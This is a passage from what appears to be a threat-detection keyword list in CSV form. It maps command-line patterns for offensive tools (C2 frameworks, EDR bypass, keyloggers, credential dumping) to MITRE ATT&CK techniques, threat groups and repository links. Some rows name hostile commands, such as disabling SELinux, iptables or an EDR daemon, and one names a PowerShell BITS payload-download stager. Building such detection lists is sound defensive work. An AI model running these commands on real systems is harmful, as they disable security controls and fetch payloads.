- T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Needle_Sift_BOF,1,0,N/A,10,10,30,7,2021-09-27T22:57:33Z,2021-09-27T20:13:10Z -net.recon *,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -nikto -*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -nimplant,offensive_tool_keyword,nimplant,user agent default field - A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -nimplant *,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -nmap *,greyware_tool_keyword,nmap,A very common tool. Network host vuln and port detector.,T1046 - T1065 - T1202 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Information Gathering,https://github.com/nmap/nmap,1,0,greyware tool - risks of False positive !,N/A,10,8299,2206,2023-09-29T08:27:35Z,2012-03-09T14:47:43Z -noclient-3.*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -onex install *,offensive_tool_keyword,onex,Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/rajkumardusad/onex,1,0,N/A,N/A,,N/A,,, -polenum *:*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -posh -u *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -powerpick *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -"powershell.exe -nop -c ""start-job *Import-Module BitsTransfer*$env:temp*GetRandomFileName()*Start-BitsTransfer -Source 'http*Remove-Item*Receive-Job*",offensive_tool_keyword,powershell,deployment of a payload through a PowerShell stager using bits to download,T1197,TA0009,N/A,N/A,Collection,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -ps_ex *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -psenum *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -psgrep *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -psinject,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -pupysh,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -python3 start_campaign.py,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,0,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -raw_keylogger *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213,TA0006 - TA0009,N/A,N/A,Collection - Credential Access - Exfiltration,https://github.com/trustedsec/SliverKeylogger,1,0,N/A,N/A,2,126,37,2023-09-22T19:39:04Z,2022-06-17T19:32:53Z -rawshark -*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -RedGuard -*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,0,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -remotereg *,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,0,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -rev2self*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -rpcclient -*,greyware_tool_keyword,rpcclient,tool for executing client side MS-RPC functions,T1021.006 - T1049,TA0002 - TA0009,N/A,N/A,Lateral movement,https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html,1,0,greyware tool - risks of False positive !,8,10,N/A,N/A,N/A,N/A -runof *.o*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -runpe *.exe*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -samdump *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -ScareCrow -*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,0,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -schkconfig off cbdaemon,greyware_tool_keyword,shell,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -scrun.exe *,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,0,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -service cbdaemon stop,greyware_tool_keyword,shell,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -service ip6tables stop,greyware_tool_keyword,iptables,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -service iptables stop,greyware_tool_keyword,iptables,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -set CMD *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -set ENDPOINT *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -set shellcode *,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -set srvhost *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -set_child *.exe,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -Set-ADObject -SamAccountName * -PropertyName scriptpath -PropertyValue *\*.exe*,greyware_tool_keyword,powershell,AD module Logon Script from remote IP,T1037.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -setenforce 0,greyware_tool_keyword,shell,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -sh_executor *,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,0,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -sharescan *.txt,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -shell.exe -u http://*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,0,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -ShellCmd *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -show shellcodes,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -SigFlip *,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -SigFlip *.exe*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 